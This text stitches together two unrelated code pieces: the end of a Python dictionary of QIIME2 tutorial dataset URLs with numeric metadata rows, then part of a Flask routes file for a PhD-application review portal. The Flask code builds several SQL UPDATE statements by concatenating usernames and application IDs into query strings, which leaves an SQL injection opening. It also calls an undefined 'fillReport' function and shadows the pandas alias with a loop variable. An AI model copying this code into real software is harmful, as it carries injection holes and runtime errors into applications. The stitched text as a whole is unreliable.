'https://docs.google.com/spreadsheets/d/e/2PACX-1vRe42IpLxZI1V5gtkuej2vuO31tyu0NCRbjECXx8SuQcarHhEqFFyluwmU72BesGWfEH-IX_tXGs8FX/pub?gid=1509704122&single=true&output=tsv',
# 2020.11
'2020.11/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.11/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/gg-13-8-99-nb-classifier.qza',
'2020.11/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/sepp-refs-gg-13-8.qza',
'2020.11/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/sepp-refs-silva-128.qza',
'2020.11/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/silva-138-99-515-806-nb-classifier.qza',
'2020.11/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/silva-138-99-nb-classifier.qza',
'2020.11/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-seqs-515-806.qza',
'2020.11/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-seqs.qza',
'2020.11/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-tax-515-806.qza',
'2020.11/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-tax.qza',
'2020.11/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.11/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.11/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.11/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/chimera/atacama-table.qza',
'2020.11/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/chimera/atacama-rep-seqs.qza',
'2020.11/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/exporting/feature-table.qza',
'2020.11/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/exporting/unrooted-tree.qza',
'2020.11/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/distance-matrix.qza',
'2020.11/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/table.qza',
'2020.11/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/taxonomy.qza',
'2020.11/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/sequences.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.11/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.11/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.11/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/sample-metadata.tsv',
'2020.11/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/table.qza',
'2020.11/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/taxa.qza',
'2020.11/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/aligned-sequences.fna',
'2020.11/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.11/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.11/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/feature-table-v100.biom',
'2020.11/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/feature-table-v210.biom',
'2020.11/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.11/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/pe-64-manifest',
'2020.11/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/pe-64.zip',
'2020.11/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/se-33-manifest',
'2020.11/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/se-33.zip',
'2020.11/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/sequences.fna',
'2020.11/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/unrooted-tree.tre',
'2020.11/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.11/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.11/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.11/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_shannon.qza',
'2020.11/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.11/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.11/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.11/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.11/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/faith_pd_vector.qza',
'2020.11/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/rep-seqs.qza',
'2020.11/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/taxonomy.qza',
'2020.11/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.11/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/otu-clustering/seqs.fna',
'2020.11/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/otu-clustering/85_otus.qza',
'2020.11/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/animal_distal_gut.qza',
'2020.11/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.11/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/pd-mice/manifest',
'2020.11/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.11/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/pd-mice/ref_tax.qza',
'2020.11/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.11/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.11/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/query-seqs.qza',
'2020.11/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/reference-seqs.qza',
'2020.11/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/quality-control/query-table.qza',
'2020.11/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/read-joining/atacama-seqs.qza',
'2020.11/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/read-joining/fj-joined.zip',
'2020.11/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/sample-classifier/atacama-table.qza',
'2020.11/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.11/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.11/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.11/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.11/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/phylogeny/rep-seqs.qza',
'2020.11/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/faith-pd-vector.qza',
'2020.11/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/jaccard-pcoa.qza',
'2020.11/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.11/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1grGhjYpf8KF56at_T0djGZPl9yYGGEX75tRc4QocZdc/edit?usp=sharing',
'2020.11/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1grGhjYpf8KF56at_T0djGZPl9yYGGEX75tRc4QocZdc/export?gid=0&format=tsv',
## Moving Pictures
'2020.11/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1hBo_NWijLILEFYJrYs7R_Bwc7i_n3ZmPKUQetpVk-pk/edit?usp=sharing',
'2020.11/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1hBo_NWijLILEFYJrYs7R_Bwc7i_n3ZmPKUQetpVk-pk/export?gid=0&format=tsv',
## Atacama
'2020.11/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1OYoGEnEulIYqCpl73Sl-wO1ipn95l3SL0kjJE3f7QPU/edit?usp=sharing',
'2020.11/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1OYoGEnEulIYqCpl73Sl-wO1ipn95l3SL0kjJE3f7QPU/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.11/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/1Qb3U4wJ89T0jmTG1mPNLu-w-tM1d8mDwOtQZA4ZMjHA/edit?usp=sharing',
'2020.11/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vSwgOEahGwBW3YqOyULE39UsoHM5ma5gHbmPJ25Co8ER2G6nRpsJQclaouBOOBZkdAROBw5ej-WTPhl/pub?gid=1303657428&single=true&output=tsv',
## PD Mice
'2020.11/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1FOKCGDa_bdGu_Vi5gZJancj8nhNevX3U_nX2YS8LirM/edit?usp=sharing',
'2020.11/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQXcEE5vD_u1dTxeZ9n0JL_BNAF1f4T1S2vpOTdUYnjxji6Gt1L-c5DhOUwcrXchm9_YSyHZo1RZgAh/pub?gid=1509704122&single=true&output=tsv',
}
| 75.735012
| 180
| 0.726802
| 9,537
| 63,163
| 4.784733
| 0.031037
| 0.028138
| 0.056276
| 0.063311
| 0.969298
| 0.96612
| 0.948983
| 0.910195
| 0.865949
| 0.829966
| 0
| 0.109774
| 0.089657
| 63,163
| 833
| 181
| 75.82593
| 0.683826
| 0.021801
| 0
| 0.010695
| 0
| 0.513369
| 0.875034
| 0.283409
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.141711
| 0
| 0.141711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ed31422c87e7c3aca55017331fc46b457f702f9
| 36,996
|
py
|
Python
|
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | 1
|
2020-06-03T15:37:37.000Z
|
2020-06-03T15:37:37.000Z
|
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | null | null | null |
portal/base/routes.py
|
AnchitSingh/SR_Portal
|
451c448544531a8e593d3a71cf606cf8cc58bbf1
|
[
"MIT"
] | null | null | null |
from flask import Flask,abort, session, render_template, url_for, flash, redirect, request,send_file, Blueprint
from portal import app, db
from portal.models import User, Post
from flask_login import login_user, current_user, logout_user, login_required
import os
import json
from os import path
import pandas as pd
import sqlite3
from datetime import datetime ,date ,timedelta
phds=Blueprint('phds',__name__,template_folder='templates')
#------------------------This code control allocation of files-------------------------------------#
@phds.route("/allocate_phd", methods=['GET', 'POST'])
@login_required
def allocate_phd():
if current_user.is_active==True:
if current_user.is_admin == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
user=User.query.all()
def foo(user,test):
i=0
user_val=0
phd_val=0
flag1=1
# for p in test:
# p[1]="1"
for x in user:
if x.is_admin == False and x.is_manager == False and x.is_active == True:
user_val=user_val+1
for pd in test:
phd_val=phd_val+1
if user_val==0:
flash('No Tutor exists','danger')
else:
quotient = phd_val//user_val
remainder = phd_val%user_val
#flash(phd_val)
for p in test:
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set Tutor1 = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
for u in user:
flag1=1
conn.commit()
i=0
conn.commit()
if u.is_admin==False and u.is_manager==False and u.is_active == True:
# print(u.username)
conn.commit()
for p in test:
# c.execute('''update phd set Tutor1 = "'''+p[1]+'''" WHERE Application = "'''+p[0]+'''";''')
# conn.commit()
if i==quotient:
if remainder > 0 :
flag1=0
if p[1]=="0":
p[1]="1"
conn.commit()
c.execute('''update phd set Tutor1 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="0" :
p[1]="1"
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set Tutor1 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "1" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
conn.commit()
for p in test:
p[1]="1"
flag1=1
quotient = phd_val//user_val
remainder = phd_val%user_val
fla=0
i=0
for u in user:
flag1=1
if u.is_admin==False and u.is_manager==False and u.is_active == True :
if fla==1:
for p in test:
if i==quotient:
if remainder > 0 :
flag1=0
if p[1]=="1" and p[3] != u.username:
p[1]="0"
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="1" and p[3]!=u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
fla=1
flag1=1
fla=0
quotient = phd_val//user_val
i=0
for u in user:
flag1=1
if u.is_admin==False and u.is_manager==False and u.is_active == True:
for p in test:
if i==quotient:
if remainder > 0 :
flag1=0
if p[1] =="1" and p[3] != u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
remainder =remainder - 1
flag1=1
if flag1 == 1:
i=0
break
if i<quotient and p[1]=="1" and p[3]!=u.username:
p[1]="0"
conn.commit()
c.execute('''update phd set Tutor2 = "'''+u.username+'''" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
c.execute('''update phd set alloc_status = "0" WHERE Application = "'''+p[0]+'''";''')
conn.commit()
i=i+1
break
for pd in test:
pd[1]="1"
flash("Phd files allocated successfully","success")
foo(user,test)
return redirect(url_for('phds.phd'))
else:
report=str(current_user.username)+' tried to accessed unauthorized route -> allocate_phd '
fillReport(report,current_user.username,datetime.now())
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
#-------------------------Allocation code ends here---------------------------------#
#-------------------------Database Creation Code------------------------------------#
@phds.route("/phdcsv", methods=['GET', 'POST'])
@login_required
def phdcsv():
if current_user.is_active ==True:
if current_user.is_admin == True:
if path.exists("portal/static/original-csv/phd.csv"):
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
df=pd.read_csv('portal/static/original-csv/phd.csv')
new_columns=set(df.columns)
if 'Application Ref. No.' in new_columns:
new_columns.remove('Application Ref. No.')
c.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='phd' ''')
if c.fetchone()[0]==1 :
c.execute('''DROP TABLE phd;''')
c.execute('''
CREATE TABLE phd (
"Application Ref. No." TEXT PRIMARY KEY UNIQUE
);''')
s=list(new_columns)
for i in range(len(s)):
c.execute('''ALTER TABLE phd ADD'''+''' "'''+s[i]+'''" '''+'''TEXT''')
df.to_sql(name='phd', con=db.engine, if_exists = 'append', index=False)
c.execute('''ALTER TABLE phd ADD tt2 DATE DEFAULT "None"''') #15
c.execute('''ALTER TABLE phd ADD tt1 DATE DEFAULT "None"''') #14
c.execute('''ALTER TABLE phd ADD ft2 DATE DEFAULT "None"''') #13
c.execute('''ALTER TABLE phd ADD st2 DATE DEFAULT "None"''') #12
c.execute('''ALTER TABLE phd ADD ft1 DATE DEFAULT "None"''') #11
c.execute('''ALTER TABLE phd ADD st1 DATE DEFAULT "None"''') #10
c.execute('''ALTER TABLE phd ADD Comment2 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission2 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Reject_Reason TEXT''')
c.execute('''ALTER TABLE phd ADD Validation TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Comment1 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission1 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Tutor1 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD Tutor2 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD alloc_status TEXT DEFAULT "0" ''')
c.execute('''ALTER TABLE phd ADD Application TEXT''')
c.execute('''update phd set Application = "Application Ref. No."; ''')
# test=c.execute('''SELECT * from phd''').fetchall()
conn.commit()
conn.close()
flash('Database successfully created', 'success')
else:
flash('phd.csv doesnot contain "Application Ref. No." column','danger')
else:
flash('First upload Csv file with name phd.csv','danger')
return redirect(url_for('upload'))
else:
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
#------------------------------------Reset Database --------------------------------------------#
@phds.route("/reset_phd", methods=['GET', 'POST'])
@login_required
def reset_phd():
if current_user.is_active == True:
if current_user.is_admin == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
c.execute('''DELETE FROM phd;''')
c.execute('''DELETE FROM violations;''')
conn.commit()
conn.close()
return redirect(url_for('phds.phd'))
else:
report=str(current_user.username)+' tried to accessed unauthorized route -> Phd Reset '
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
return render_template('error.html',error=403)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route("/downloadphdCsv")
@login_required
def downloadphdCsv():
if current_user.is_active == True:
if current_user.is_admin == True or current_user.is_manager==True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
db_df=pd.read_sql_query("SELECT * FROM phd", conn)
if 'alloc_status' in db_df.columns:
db_df=db_df.drop('alloc_status',1)
if 'Submission1' in db_df.columns:
db_df=db_df.drop('Submission1',1)
if 'Submission2' in db_df.columns:
db_df=db_df.drop('Submission2',1)
if 'Comment2' in db_df.columns:
db_df=db_df.drop('Comment2',1)
if 'st1' in db_df.columns:
db_df=db_df.drop('st1',1)
if 'ft1' in db_df.columns:
db_df=db_df.drop('ft1',1)
if 'st2' in db_df.columns:
db_df=db_df.drop('st2',1)
if 'ft2' in db_df.columns:
db_df=db_df.drop('ft2',1)
if 'tt1' in db_df.columns:
db_df=db_df.drop('tt1',1)
if 'tt2' in db_df.columns:
db_df=db_df.drop('tt2',1)
if 'Reject_Reason' in db_df.columns:
db_df=db_df.drop('Reject_Reason',1)
if 'Validation' in db_df.columns:
db_df=db_df.drop('Validation',1)
if 'Application' in db_df.columns:
db_df=db_df.drop('Application',1)
if 'Comment1' in db_df.columns:
db_df=db_df.drop('Comment1',1)
if 'Tutor1' in db_df.columns:
db_df=db_df.drop('Tutor1',1)
if 'Tutor2' in db_df.columns:
db_df=db_df.drop('Tutor2',1)
db_df.to_csv('portal/static/Updated-CSV/Updated-phd.csv', index=False)
p="static/Updated-CSV/Updated-phd.csv"
conn.close()
return send_file(p,as_attachment=True)
else:
return render_template('error.html',error=403)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route("/phd")
@login_required
def phd():
if current_user.is_active == True:
user=User.query.all()
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
t=c.execute('''PRAGMA table_info('phd')''').fetchall()
if (len(test)):
length=len(test[0])
else:
length=0
test=[tup[::-1] for tup in test]
t.reverse()
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
conn.close()
if current_user.is_admin==True or current_user.is_manager == True:
return render_template('phd_admin.html', title='Phd',user=user,image_file=image_file,phd=test,t=t,length=length)
else:
return render_template('phd_ta.html', title='Phd',user=user,image_file=image_file,phd=test,t=t,length=length)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/lab_phd/<application>')
@login_required
def lab_phd(application):
    """Detail view of one PhD file, warning if the TA has not submitted it.

    Fixes: the sqlite connection was never closed (leaked per request).
    """
    if current_user.is_active == True:
        image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        test=c.execute('''SELECT * FROM phd''').fetchall()
        t=c.execute('''PRAGMA table_info('phd')''').fetchall()
        conn.close()  # fix: connection was previously leaked
        if (len(test)):
            length=len(test[0])
        else:
            length=0
        test=[tup[::-1] for tup in test]
        t.reverse()
        for p in test:
            if p[0]==application:
                # p[4] is Submission1 after row reversal (see phdcsv ALTERs).
                if p[4] != 'Done':
                    flash('This file has not yet been submitted by TA', 'danger')
                return render_template('lab_phd.html',image_file=image_file,title='Lab',cand=p,t=t,length=length)
        # NOTE(review): an unknown application id falls through and the view
        # returns None (a 500) — preserved from the original behavior.
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/ta_lab_phd/<application>')
@login_required
def ta_lab_phd(application):
    """TA view of one PhD file; records the start timestamp (st1/st2) the
    first time Tutor1 opens it.

    Fixes: the sqlite connection was never closed (leaked per request).
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        test=c.execute('''SELECT * FROM phd''').fetchall()
        t=c.execute('''PRAGMA table_info('phd')''').fetchall()
        if (len(test)):
            length=len(test[0])
        else:
            length=0
        test=[tup[::-1] for tup in test]
        t.reverse()
        image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
        for p in test:
            if p[0]==application:
                # p[3]=Tutor1, p[10]=st1, p[12]=st2 after row reversal.
                if current_user.username==p[3]:
                    if p[10] == 'None':
                        # First open of round 1: stamp st1.
                        c.execute("update phd set st1 = ? WHERE Application = ?",(datetime.now(),application))
                        conn.commit()
                    else:
                        if p[12] == 'None':
                            # Round 1 already started: stamp st2 for round 2.
                            c.execute("update phd set st2 = ? WHERE Application = ?",(datetime.now(),application))
                            conn.commit()
                conn.close()  # fix: connection was previously leaked
                return render_template('ta_lab_phd.html',image_file=image_file,title='Lab',cand=p,t=t,length=length)
        conn.close()
        # NOTE(review): unknown application id returns None (a 500) —
        # preserved from the original behavior.
    else:
